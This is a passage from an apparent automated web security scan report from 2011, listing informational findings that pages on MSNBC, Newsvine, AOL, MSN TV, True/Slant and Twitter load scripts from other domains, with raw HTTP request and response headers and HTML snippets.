<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.385. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.msn.com
Path:   /id/41319614/ns/today-entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41319614/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=129
Date: Sun, 30 Jan 2011 01:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133030


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-ent-sheen-hmed.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10508"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.386. http://toddkenreck.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:39 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.387. http://top.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:00:36 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.388. http://top.newsvine.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /users

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:16 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 25806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.389. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.aol.com
Path:   /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /$%7Chttp:/netscape.aol.com/$%7Chttp:/music.aol.com/radioguide/bb/$%7Chttp:/money.aol.com/$%7Chttp:/www.aim.com/help_faq/starting_out/buddylist.adp/$%7Chttp:/www.weblogs.com/$%7Chttp:/smallbusiness.aol.com/$%7Chttp:/www.blackvoices.com/$%7Chttp:/latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video
Date: Sun, 30 Jan 2011 01:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=24C8300C2A06E9010602B17132ED72CA; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 53066


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/js/mg2.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery-1.4.2.min.js"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/travel/travel-old-app/js/globalScript.js"></script>
   <script type="text/javascript" language="JavaScript1.1" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

23.390. http://trueslant.com/milesobrien/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trueslant.com
Path:   /milesobrien/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /milesobrien/ HTTP/1.1
Host: trueslant.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:12 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Vary: Cookie,Accept-Encoding
X-FBC-Login: anonymous fbuid=0, wpuid=0
X-Pingback: http://trueslant.com/milesobrien/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSSESSID=ts-www0; path=/
Content-Length: 75441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" dir="ltr" xmlns:fb="http
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.391. http://tv.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69709
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN TV: Ho
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.392. http://tv.redacted/tv/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /tv/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54757
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Source: Sh
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.393. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:51:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296352284-49541-12061
ETag: "cde121a33e5e26c8e020ac06ab7c0791"
Last-Modified: Sun, 30 Jan 2011 01:51:24 GMT
X-Runtime: 0.00851
Content-Type: text/html; charset=utf-8
Content-Length: 45480
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296265969/javascripts/widgets/widget.js?1296269366" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

23.394. http://twitter.com/HelenASPopkin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /HelenASPopkin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356567-38386-11000
ETag: "ea52c5afedc85cb07c6fff4a75310922"
Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT
X-Runtime: 0.01712
Content-Type: text/html; charset=utf-8
Content-Length: 52277
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.395. http://twitter.com/MichaelWann

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /MichaelWann

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356547-81727-2377
ETag: "8262f10ce7c81e5136cabe2a78847bad"
Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT
X-Runtime: 0.01194
Content-Type: text/html; charset=utf-8
Content-Length: 52843
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/twitter.js?1296269366" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296269366" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366" type="text/javascript"></script>
...[SNIP]...

23.396. http://twitter.com/windabenedetti

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /windabenedetti

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356577-57560-43117
ETag: "37e7d4764aa4356aeb8c7f93b34df6b0"
Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 49069
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.397. http://twitter.com/wjrothman

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /wjrothman

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 18:55:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296413719-4434-25111
ETag: "75cfb46afa1436d39a8b9e0c50c70e37"
Last-Modified: Sun, 30 Jan 2011 18:55:19 GMT
X-Runtime: 0.02204
Content-Type: text/html; charset=utf-8
Content-Length: 49632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296413719421374; path=/; expires=Sun, 06-Feb-11 18:55:19 GMT; domain=.twitter.com
Set-Cookie: guest_id=129641371945829376; path=/; expires=Tue, 01 Mar 2011 18:55:19 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTBlZTMzYjgwYjMzOGM4ZDQ5NmQxNzY1ODAxZTM4OTU3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIpHtH2C0B--ba9d5d1834ac29d7d8bf248a700f2eed994eb117; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
